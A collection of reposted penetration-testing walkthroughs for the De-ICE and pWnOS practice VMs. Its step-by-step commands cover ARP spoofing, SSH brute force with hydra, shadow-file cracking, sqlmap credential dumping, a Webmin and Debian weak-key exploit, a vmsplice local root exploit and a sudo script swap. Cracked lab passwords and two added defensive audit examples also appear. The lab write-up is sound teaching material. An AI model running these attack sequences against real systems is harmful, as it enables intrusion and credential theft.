echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth1 -t 10.0.0.3 10.0.0.9

arpspoof -i eth1 -t 10.0.0.9 10.0.0.3

wireshark -i eth1 -k

python chap2asleap.py
python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v

cd /pentest/passwords/wordlists
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3


That's all! See you.

HOWTO : De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.

The original post is here.

Links

Watch video on-line
Download video

What is this?

This is my walkthrough of how I broke into the De-ICE.net network, level 1, disk 1.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

What do I need?

BackTrack 4 (Final)
de-ice.net-1.100-1.0.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
Dictionary(s)

Software
Name: De-ICE.net
Version: 1.0 (Level 1 - Disk 1 - IP Address: 1.100)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/

Download Link:
http://www.mediafire.com/?bfo9b21g2m69tb6
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.100-1.1.iso

Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=16&t=13
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

nmap -n 192.168.1.1-255

nmap -n -sS -sV -O 192.168.1.100

firefox 192.168.1.100

[+]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast

hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s

ssh bbanter@192.168.1.100
// "Yes" if quiz about trusting authenticity. Password: bbanter

cd /etc/

cat passwd

[+]kate -> Update usernames. Save.

cat group

exit

cd /root/tools/dictionary/

cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords

hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords

ssh aadams@192.168.1.100
// Password: nostradamus

cd /etc/

sudo cat shadow
// Password: nostradamus

[+]kate -> New -> Paste -> Save. Filename: shadow

exit

john

./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot

ssh aadams@192.168.1.100
// Password: nostradamus

su
// Password: tarot

ls -a

cd ..

ls -a

cd ftp/

ls -a

cd incoming/

ls -a

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot

cd /etc/

vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)

modprobe capability

exit

exit

ftp 192.168.1.100
// User: root. Password: tarot

ls -a

cd ..

ls -a

cd home

ls -a

cd ftp

ls -a

cd incoming

ls -a

get salary.csv

cd /pentest/passwords/jtr

ls

mv salary.csv ~

[+]kate -> salary.csv

// GAME OVER

----------------------------------------------------------------------------------------------------
Users
root:tarot = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------


Notes

Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you.

HOWTO : De-ICE.net v1.1 (1.110) {Level 1 - Disk 2}

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post it here for educational purposes only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post is here

Links

Watch video on-line
Download video

What is this?

This is my walkthrough of how I broke into the De-ICE.net network, level 1, disk 2.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

What do I need?

BackTrack 4 (Final)
de-ice.net-1.110-1.0.iso (MD5: a626d884148c63bfc9df36f2743d7242)
Dictionary(s)

Software
Name: De-ICE.net
Version: 1.1 (Level 1 - Disk 2 - IP Address: 1.110)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/

Download Link:

http://www.mediafire.com/?tnci5ewmcoyrp8o
http://de-ice.hackerdemia.com/lib/exe/fetch.php?id=start&cache=cache&media=wiki:de-ice_netcat-1.0.iso
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.110-1.0.iso

Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=16&t=13
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

nmap -n 192.168.1.1-255

nmap -n -sS -sV -O 192.168.1.110

firefox 192.168.1.110

[+]kate -> make list of possible usernames

// lastF, fLast

ftp 192.168.1.110

// Username: anonymous. Password: [Blank]

ls -a

cd download

ls -a

cd etc

ls -a

get core

exit

strings core

[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is on its own line -> Save. Filename: shadow

cd tools/dictionary/

cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords

john

./john --rules --wordlist=/root/passwords /root/shadow
//Password: root:Complexity & ccoffee:Diatomaceous

ssh ccoffee@192.168.1.110
//Password: Diatomaceous

ls -a

cd ..

ls -a

cd root/

ls -a

cd .save/

su
//Password: Complexity

cd .save/

ls -a

cat copy.sh

openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw

ls -a

cat customer_account.csv
// GAME OVER

----------------------------------------------------------------------------------------------------
Users
root:Complexity = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams: = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:Zymurgy = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------


Notes

Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you!

HOWTO : De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post it here for educational purposes only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post is here

Links

Watch video on-line
Download video

What is this?

This is my walkthrough of how I broke into the De-ICE.net network, level 2, disk 1.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

What do I need?

BackTrack 4 (Final)
de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)
Dictionary(s)

Software
Name: De-ICE.net
Version: 2.0 (Level 1 - Disk 2 - IP Address: 1.100)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/

Download Link:

http://heorot.net/instruction/tutorials/iso/de-ice.net-2.100-1.1.iso
http://www.mediafire.com/file/uyecnhvkeije0br/de-ice.net-2.100-1.0.part1.rar
http://www.mediafire.com/file/l2ezefrg05mmtrr/de-ice.net-2.100-1.0.part2.rar

Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=18&t=16
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

nmap -n 192.168.2.1-255

nmap -n -sV -sS -O 192.168.2.100

nmap -n -sV -sS -O 192.168.2.101

firefox 192.168.2.100

[+]kate -> list of possible usernames. Save. Filename: usernames.txt

firefox 192.168.2.101

[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' in front. -> http://192.168.2.101 -> 80



firefox http://192.168.2.101/~pirrip

[+]kate -> Update usernames with the ones which we got a respond from. Save.

[+]BackTrack -> Web Application Analysis -> Web (frontend) -> nikto2

./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124

firefox http://192.168.2.101/~pirrip/.ssh

// Save both files

mv /root/id_rsa /root/.ssh/id_rsa

mv /root/id_rsa.pub /root/.ssh/id_rsa.pub

chmod 000 /root/.ssh/id_rsa

chmod 000 /root/.ssh/id_rsa.pub

ssh pirrip@192.168.2.100
// Yes

mailx
// 3 - we see that havisham's password is 'changeme'. 7 - we see that pirrip's password is '0l1v3rTw1st'

cd /etc/

vi passwd

// kate -> Update usernames with only valid ones.

vi group

sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st

su
// Password: 0l1v3rTw1st

cd /root/

ls -a

cd .save/

ls -a

chmod -R 777 /root/

//In BackTrack//

scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/

unzip great_expectations.zip

tar xf great_expectations.tar

strings Jan08

//In SSH//
sudo vi /var/mail/havisham

modprobe capability

//In BackTrack//
ftp 192.168.2.100
// Username: pirrip. Password: 0l1v3rTw1st //

ls -a

//In SSH//

exit


//In BackTrack//

[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
// GAME OVER

----------------------------------------------------------------------------------------------------
Users
root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------


Notes

Dictionaries : http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you.

Sunday, September 11, 2011

HOWTO : pWnOS

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post it here for educational purposes only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post is here

Links

Watch video on-line
Download video

What is this?

This is my walkthrough of how I broke into pWnOS v1.

pWnOS is on a "VM Image", that creates a target on which to practice penetration testing; the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points.

Scenario

A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.

It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t.

What do I need?

BackTrack 4 (Final)
pWnOS.vmdk
exploit-db.com or milw0rm.

Software
Name: pWnOS
Version: 1
Home Page: http://0dayclub.com/files/pWnOS%20v1.0.zip

Download Link:

http://www.mediafire.com/file/ec3hmlzuyzy/pWnOS v1.0.part1.rar
http://www.mediafire.com/file/yngwzqkxmin/pWnOS v1.0.part2.rar
http://www.mediafire.com/file/htmqm3dzgya/pWnOS v1.0.part3.rar

http://www.0dayclub.com/public/index...nOS%20v1.0.zip
http://krash.in/bond00/new/pWnOS%20v1.0.zip
http://0dayclub.com/files/pWnOS%20v1.0.zip

Forum/Support: http://forums.heorot.net/viewforum.php?f=21

Commands

nmap 192.168.3.1-255

nmap -sV -sS -O 192.168.3.100

firefox http://192.168.3.100

firefox http://192.168.3.100:10000


firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php
*Webmin <> save. Filename: shadow

firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb
*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*
http://milw0rm.com/exploits/5622 (perl)
http://milw0rm.com/exploits/5720 (python)
http://milw0rm.com/exploits/5632 (ruby)
http://www.exploit-db.com/exploits/5622 (perl)
http://www.exploit-db.com/exploits/5720 (python)
http://www.exploit-db.com/exploits/5632 (ruby)

wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys
perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys

tar jxvf debian_ssh_rsa_2048_x86.tar.bz2

cd rsa/2048

grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub
*scans for the public key...*

ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100
exit

ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100
hostname
uname -a

firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c
*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*
http://milw0rm.com/exploits/5092 (c)
http://www.exploit-db.com/exploits/5092 (c)

nano vmsplice.c

gcc vmsplice.c -o vmsplice

./vmsplice

whoami

----------------------------------------------------------------------------------------------------
Users
root: root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
vmware: vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama: obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama: osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama: yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
----------------------------------------------------------------------------------------------------


Notes

I had problems with the Debian OpenSSH/OpenSSL exploit: sometimes it would work, else it would be really slow or just can't find the correct exploit file. The method which I use turns it into an offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for reading it). It relies on the default path tho!

This is one method of getting in, the author did say that there are multiple ways in!

It also took me a bit of work to get it to work with virtual box & static IP addresses.

That's all! See you.

HOWTO : De-ICE.net v1.2a (1.20a) {Level 1-Disk 3-Version A}

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post it here for educational purposes only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post is here

Links

Watch video on-line
Download video

Brief Overview

De-ICE has another challenge in its "vulnerable-by-design" series - even though the naming gets more confusing with every release! It's been a while since the last release, level 2-disk 1 (back in 2007). The students of "HackingDojo" were challenged to put together their own exploitable LiveCD, and it was released under the de-ice name. This is "version a", and should be not confused with "version B" (de-ice-1.120-1.0b.iso aka Level 1-Disk 3-Release 1-Version B), as these are NOT the same challenge - it's a different setup.

Heorot.net releases (in date order):

De-ICE - Level 1 - Disk 1 (de-ice.net-1.100-1.1.iso)
De-ICE - Level 1 - Disk 2 (de-ice.net-1.110-1.0.iso)
De-ICE - Level 2 - Disk 1 (de-ice.net-2.100-1.1.iso)
pWnOS (pWnOS v1.0.zip)
Hackerdemia (hackerdemia-1.1.0.iso)
De-ICE - Level 1 - Disk 3 - Version A (de-ice-1.120-1.0a.iso)
De-ICE - Level 1 - Disk 3 - Version B (de-ice-1.120-1.0b.iso)

Method

Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)
Scan network for the host (nmap)
Port scanned host (unicornscan)
Enumerated running services running open ports (nmap)
Discovered a SQL Injection (Firefox)
Dump all usernames & passwords to the database (sqlmap)
Tested for any repeated logins with known usernames & working passwords (hydra)
Escalated privilege by incorrectly configured settings (sudo)

What do I need?

de-ice-1.120-1.0a.iso (MD5: E8FB66760ADDF85896DB3F78F278F7D2)
Spare or a Virtual machine (Example: Virtual Box or VMware Player)
nmap – (Can be found on BackTrack 5).
unicornscan – (Can be found in BackTrack 5 repository).
sqlmap – (Can be found on BackTrack 5).
hydra – (Can be found on BackTrack 5).

Walkthrough

A quick "ping" scan with nmap shows which hosts are connected to the network. Once the target had been discovered, a detailed port scan (TCP & UDP) was taken by using unicornscan. To check the results another detailed TCP port scan was done, though this time it was done using nmap. Unicornscan uses a lot less time to do a port scan compared to nmap (especially with UDP scanning). However, nmap has the advantage of being able to do more than just "port scanning" by "information gathering". The attacker uses the "-a" option, which allows for "OS detection", "version detection of services", "a collection of script scanning", and "traceroute details" as well as increasing the scan speed by "-T4". nmap also confirms TCP port 80 is open, which is the default port for a web server, as well as detecting basic information regarding the configuration of the server.

The attacker then interacts with the web server and is presented with a "Data Entry" site. There isn't any protection on the server, which allows for the attacker to add a new product into the system. Upon doing so, the attacker notices the URI of the current page, "products.php?id=1". By using the ID variable, the server selects the requested item. The attacker tries to inject their own code allowed with it.

The attacker uses sqlmap to speed up the injection process as it is designed to test multiple injection methods. sqlmap has pre-built commands which allow the attacker to find common sensitive information (such as the running services and versions, current user and the database admin, user privileges as well as viewing every table along with the contents). The attacker chooses to capture all the users and their passwords to the database services. The passwords used in the database are encrypted, however, they use a well-known scheme which is easily cracked. The result of this gives the attacker 50 working usernames as well as 49 known passwords too.

The attacker then checks to see if any of the users have reused their passwords (or if they have used someone else's known password, any blank passwords or their usernames as the passwords), by brute forcing the SSH remote login. The result of this action gives the attacker remote access to the system with 50 credentials.

On the list of credentials, the attacker notices a few usernames which they have seen before from previous pentests for the company. The attacker then logs into their accounts and views their personal folders. Upon accessing the "ccoffee" account, there was a directory (scripts) located inside. In this folder, there was a file which was only accessible to the super user account, root. The attacker then checks to see if any privileges have been assigned to the user for this file - they have been. The attacker then backs up the file and replaces it with their own file - which is a shell prompt.

The attacker highlights the fact that the full path has to be specified for sudo to allow access to the file. After this command has been executed, the attacker now has complete access to the system. The attacker collects a bit of information about the system (IP addresses, user hashes and accesses the personal folder for the root account).

As the attacker now has access to the complete system, they access every user folder at once and view random files at their choosing; a selection of them are sensitive to the company. (Note: I skipped the majority of them out for two reasons: 1.) It's boring watching me cat'ing them all and 2.) It allows you to view them for yourselves).
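The privilege escalation described above rests on a sudo rule whose target script lives in a directory the same user owns, so the user can swap the script for a shell; the walkthrough also notes that sudo only honours the full path. An administrator can audit for exactly that pattern. The Python audit below is an added example, not part of g0tmi1k's post or of the De-ICE image: SUDOERS is a constructed sudoers excerpt modelled on the ccoffee rule, and FAKE_FS is a constructed owner/mode map standing in for os.stat() so the block runs offline.

```python
import os
import re
import stat
from dataclasses import dataclass

# Constructed sudoers excerpt modelled on the De-ICE 1.2a misconfiguration:
# ccoffee may run, as root, a script that sits inside ccoffee's own home directory.
SUDOERS = """\
root    ALL=(ALL) ALL
ccoffee ALL=(root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh
aadams  ALL=(root) /usr/bin/tail /var/log/messages
bbanter ALL=(root) /usr/local/bin/backup.sh
"""

# Constructed stand-in for os.stat(): path -> (owner, mode). A real audit stats the files.
FAKE_FS = {
    "/home/ccoffee/scripts/getlogs.sh": ("root", 0o755),
    "/home/ccoffee/scripts": ("ccoffee", 0o755),
    "/usr/bin/tail": ("root", 0o755),
    "/usr/local/bin/backup.sh": ("root", 0o777),
    "/usr/local/bin": ("root", 0o755),
}

# user host=(runas) [NOPASSWD:] command [args]   (simplified sudoers grammar)
RULE_RE = re.compile(r"^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?:NOPASSWD:\s*)?(?P<cmd>.+)$")


@dataclass
class Finding:
    user: str
    command: str
    reason: str


def parse_rules(text):
    """Return (user, command) for each rule line; comments and blanks are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group("user"), m.group("cmd").strip()))
    return rules


def user_can_write(user, path, fs):
    """True if user can modify the file, or replace it by writing its parent directory."""
    for p in (path, os.path.dirname(path)):
        entry = fs.get(p)
        if entry is None:
            continue
        owner, mode = entry
        if (owner == user and mode & stat.S_IWUSR) or mode & stat.S_IWOTH:
            return True
    return False


def audit(text, fs):
    """Flag sudo rules whose target the rule's own user could swap for a shell."""
    findings = []
    for user, cmd in parse_rules(text):
        if cmd == "ALL":
            continue
        path = cmd.split()[0]
        if not path.startswith("/"):
            findings.append(Finding(user, path, "relative path (sudoers commands must be absolute)"))
            continue
        if path.startswith(f"/home/{user}/"):
            findings.append(Finding(user, path, "command lives in the user's own home"))
        if user_can_write(user, path, fs):
            findings.append(Finding(user, path, "command file or its directory is writable by the user"))
    return findings


if __name__ == "__main__":
    for f in audit(SUDOERS, FAKE_FS):
        print(f"{f.user}: {f.command} -> {f.reason}")
```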

Game over

Commands

ifconfig eth0
ifconfig eth0 192.168.1.59
ifconfig eth0
nmap 192.168.1.* -n -sn -sP
us -H -msf -Iv 192.168.1.120 -p 1-65535 && us -H -mU -Iv 192.168.1.120 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.1.120
firefox 192.168.1.120 # Add new product -> view product
cd /pentest/database/sqlmap
./sqlmap.py -u "http://192.168.1.120/products.php?id=1" -f -b --current-user --is-dba --privileges --dbs --dump
./sqlmap.py -u "http://192.168.1.120/products.php?id=1" --users --passwords
cd output/192.168.1.120/
ll
grep -i administrator log
grep -i localhost log | grep -v : | sort | uniq
grep -i localhost log | grep -v : | sort | uniq | sed "s/\[\*\] '//" | sed "s/'@'localhost'//" > /tmp/users
grep "clear-text" log | sort | uniq
grep "clear-text" log | sort | uniq | sed "s/ clear-text password: //" > /tmp/passwords
wc -l /tmp/users
hydra -L /tmp/users -P /tmp/passwords -e ns 192.168.1.120 ssh 2>/dev/null | tee /tmp/output
#medusa -h 192.168.1.120 -U /tmp/users -P /tmp/passwords -O /tmp/output -e ns -M ssh
ssh ccoffee@192.168.1.120
ls
cd scripts
ls -lah
sudo -l
cat getlogs.sh
mv getlogs.sh getlogs.bkup
echo "/bin/sh" > getlogs.sh
cat getlogs.sh
chmod +x getlogs.sh
ls -l
./getlogs.sh
id
exit
sudo getlogs.sh
sudo /home/ccoffee/scripts/getlogs.sh
id
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root/
ls -lAhR /home
#cat /home/aallen/gravy.txt
cat /home/aspears/hbkae
cat /home/bbanter/notes
cat /home/cchisholm/reminders.text
cat /home/ccoffee/DONOTFORGET
#cat /home/hlovell/creepy.doc
cat /home/jalvarez/draft
cat /home/jdavenport/company_address.txt
#cat /home/jdavenport/svrc.txt
cat /home/jduff/todo.txt
#cat /home/krenfro/list
cat /home/ktso/personnel.doc
#cat /home/kwebber/list
#cat /home/lmartinez/favorite.txt
#cat /home/mnader/layout
cat /home/rpatel/schedule


Notes

- De-ICE.net v1.2a has a static IP address of 192.168.1.120. Make sure you are on the same subnet as it!
- When booting De-ICE it will randomly assign the passwords to the usernames - so it's different each time!
- Each time you start De-ICE.net v1.2a it will generate fresh SSH keys - so it's different each time!
- I made a couple of mistakes in the video (For example: /devnull) - it's worth checking the commands subsection!

That's all! See you.

HOWTO : De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post it here for educational purposes only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post is here

Links

Watch video on-line
Download video

Brief Overview

The "vulnerable-by-design" series De-ICE, has released another challenge. However, it's in two different parts - which makes the naming more confusing! This is De-ICE level 1-disk 3, the second half, and it should not be confused with "version a" (de-ice-1.120-1.0a.iso aka Level 1-Disk 3-Release 1-Version A), as these are NOT the same challenge - it's a completely independent challenge. The students of "HackingDojo" produced their own exploitable LiveCD which was released under the de-ice name. This is it. To date all of Heorot.net releases (in date order) are as follows:

De-ICE - Level 1 - Disk 1 (de-ice.net-1.100-1.1.iso)
De-ICE - Level 1 - Disk 2 (de-ice.net-1.110-1.0.iso)
De-ICE - Level 2 - Disk 1 (de-ice.net-2.100-1.1.iso)
pWnOS (pWnOS v1.0.zip)
Hackerdemia (hackerdemia-1.1.0.iso)
De-ICE - Level 1 - Disk 3 - Version A (de-ice-1.120-1.0a.iso)
De-ICE - Level 1 - Disk 3 - Version B (de-ice-1.120-1.0b.iso)

Method

Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)
Scan network for the host (nmap)
Port scanned host (unicornscan)
Enumerated running services running open ports (nmap)
Enumerated possible username(s) (Netcat)
Brute forced login details (Hydra)
Profiled other users (CUPP)
Escalated privilege by re-creating custom encryption program (Java)
Found the "flag" (a database file)

What do I need?

de-ice-1.120-1.0b.iso (MD5: 5AFEA4D036681093408AE493D4BD2672)
Spare or a Virtual machine (Example: Virtual Box or VMware Player)
nmap – (Can be found on BackTrack 5).
unicornscan – (Can be found in BackTrack 5's repository).
hydra – (Can be found on BackTrack 5).
Common User Passwords Profiler – (Can be found on BackTrack 5).
Java compiler – (Can be found on BackTrack 5).

Walkthrough

By doing a quick "ping" scan with nmap, it reveals the live hosts on the network. Once the target has been discovered, a detailed port scan (TCP & UDP) was taken via unicornscan. The results were then checked with another detailed TCP port scan as well as enumerating which services are running by using nmap. Unicornscan is quicker doing a port scan (especially with UDP scanning). However, nmap has the upside of it being able to do more by "information gathering", for example "OS detection", "version detection of services", "a collection of script scanning" and "traceroute details" (by using "-a" option). The attacker also increases the scan speed (by "-T4"). Nmap also confirms TCP port 80 is open, which is being used for a web server (it's also the default port).

The attacker interacts with the web server and is presented with the "Company Portal" page. There is a message explaining that the web site is "under maintenance", with methods of contact - a telephone number and email address.

The port scan revealed that there was an SMTP service running, and the attacker decided to attempt to use the email address to identify possible usernames. The first method (VRFY) was disabled, so the attacker proceeds to draft an email. Depending on the recipient's name it will return if the account is valid or not. The attacker then tries different combinations of the given email address (CustomerServiceAdmin@nosecbank.com) until they find its valid login, csadmin.
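The RCPT TO probing described above (VRFY refused, then recipient names guessed one at a time) leaves a distinctive trail in the mail server log: one client, many "User unknown" rejections in a short window. The detection logic below is an added example, not part of g0tmi1k's post or of the De-ICE image; the LOG lines are constructed Postfix-style smtpd entries that reuse the walkthrough's addresses (192.168.1.192, attacker@slax.example.net, nosecbank.com), and the window and threshold values are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Postfix-style smtpd log, modelled on the enumeration in the walkthrough:
# a VRFY refusal followed by RCPT TO probes of guessed addresses from one client,
# plus one unrelated bounce from a partner MTA that should not be flagged.
LOG = """\
Dec 22 16:45:01 mail postfix/smtpd[2101]: connect from unknown[192.168.1.192]
Dec 22 16:45:02 mail postfix/smtpd[2101]: NOQUEUE: reject: VRFY from unknown[192.168.1.192]: 502 5.5.1 VRFY command is disabled; to=<customerserviceadmin> proto=SMTP helo=<attacker>
Dec 22 16:45:04 mail postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[192.168.1.192]: 550 5.1.1 <customerserviceadmin@nosecbank.com>: Recipient address rejected: User unknown in local recipient table; from=<attacker@slax.example.net> to=<customerserviceadmin@nosecbank.com> proto=SMTP helo=<attacker>
Dec 22 16:45:09 mail postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[192.168.1.192]: 550 5.1.1 <customer.service.admin@nosecbank.com>: Recipient address rejected: User unknown in local recipient table; from=<attacker@slax.example.net> to=<customer.service.admin@nosecbank.com> proto=SMTP helo=<attacker>
Dec 22 16:45:15 mail postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[192.168.1.192]: 550 5.1.1 <cs.admin@nosecbank.com>: Recipient address rejected: User unknown in local recipient table; from=<attacker@slax.example.net> to=<cs.admin@nosecbank.com> proto=SMTP helo=<attacker>
Dec 22 16:45:21 mail postfix/smtpd[2101]: NOQUEUE: reject: RCPT from unknown[192.168.1.192]: 550 5.1.1 <csa@nosecbank.com>: Recipient address rejected: User unknown in local recipient table; from=<attacker@slax.example.net> to=<csa@nosecbank.com> proto=SMTP helo=<attacker>
Dec 22 16:45:30 mail postfix/smtpd[2101]: 3F2A1C0B1: client=unknown[192.168.1.192]
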